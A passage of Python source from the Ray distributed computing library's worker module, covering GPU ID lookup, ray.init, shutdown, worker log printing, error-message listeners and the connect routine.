started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
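    Example (illustrative sketch; assumes the task runs on a node with at
    least one GPU):
    .. code-block:: python
        @ray.remote(num_gpus=1)
        def use_gpu():
            # Returns e.g. [0] for the GPU assigned to this task.
            return ray.get_gpu_ids()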
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
    This method handles two cases: either a Ray cluster already exists and we
    just attach this driver to it, or we start all of the processes associated
    with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows.
.. code-block:: python
ray.init(address="auto")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
        resources: A dictionary mapping the names of custom resources to the
            quantities of those resources available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
        dashboard_port (int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
        namespace (str): Namespace to use for this job.
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
        _metrics_export_port (int): Port number through which Ray exposes
            system metrics via a Prometheus endpoint. It is currently under
            active development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
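    Example (illustrative only; starts a new local cluster with explicit
    resource limits):
    .. code-block:: python
        ray.init(num_cpus=4, num_gpus=0)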
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
            # redis removal is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
        # # didn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
    function is to clean up state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
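    Example (illustrative only; a typical pattern for cleaning up state
    between tests):
    .. code-block:: python
        ray.init()
        # ... run tasks or create actors ...
        ray.shutdown()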
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# disconnect internal kv
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
_internal_kv_reset()
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# We need to reset function actor manager to clear the context
global_worker.function_actor_manager = FunctionActorManager(global_worker)
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
def listen_error_messages_from_gcs(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to be published.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
# TODO: we should just subscribe to the errors for this specific job.
worker.gcs_error_subscriber.subscribe()
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if received a signal that the thread should stop.
if threads_stopped.is_set():
return
_, error_data = worker.gcs_error_subscriber.poll()
if error_data is None:
continue
if error_data.job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if error_data.type == ray_constants.TASK_PUSH_ERROR:
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, ConnectionError) as e:
logger.error(f"listen_error_messages_from_gcs: {e}")
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
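    Example (illustrative only):
    .. code-block:: python
        assert not ray.is_initialized()
        ray.init()
        assert ray.is_initialized()
        ray.shutdown()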
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
startup_token=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
        job_id: The ID of the job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
startup_token (int): The startup token of the process assigned to
it during startup as a command line argument.
        ray_debugger_external (bool): If True, make the Ray debugger
            available externally to the node this worker is running on.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
worker.gcs_channel = gcs_utils.GcsChannel(redis_client=worker.redis_client)
worker.gcs_client = gcs_utils.GcsClient(worker.gcs_channel)
_initialize_internal_kv(worker.gcs_client)
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
worker.gcs_pubsub_enabled = gcs_pubsub_enabled()
worker.gcs_publisher = None
if worker.gcs_pubsub_enabled:
worker.gcs_publisher = GcsPublisher(
channel=worker.gcs_channel.channel())
worker.gcs_error_subscriber = GcsErrorSubscriber(
channel=worker.gcs_channel.channel())
worker.gcs_log_subscriber = GcsLogSubscriber(
channel=worker.gcs_channel.channel())
worker.gcs_function_key_subscriber = GcsFunctionKeySubscriber(
channel=worker.gcs_channel.channel())
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.publish_error_to_driver(
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None,
redis_client=worker.redis_client,
gcs_publisher=worker.gcs_publisher)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
    elif mode not in (LOCAL_MODE, WORKER_MODE, SPILL_WORKER_MODE,
                      RESTORE_WORKER_MODE):
        # Reject any unknown worker mode up front.
        raise ValueError(
            "Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if (mode == SCRIPT_MODE and not job_config.client_job
and job_config.runtime_env):
scratch_dir: str = worker.node.get_runtime_env_dir_path()
runtime_env = job_config.runtime_env or {}
runtime_env = upload_py_modules_if_needed(
runtime_env, scratch_dir, logger=logger)
runtime_env = upload_working_dir_if_needed(
runtime_env, scratch_dir, logger=logger)
# Remove excludes, it isn't relevant after the upload step.
runtime_env.pop("excludes", None)
job_config.set_runtime_env(runtime_env)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid, startup_token)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
    # trying to properly shut down the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_from_gcs
if worker.gcs_pubsub_enabled else listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and not job_config.runtime_env_has_uris():
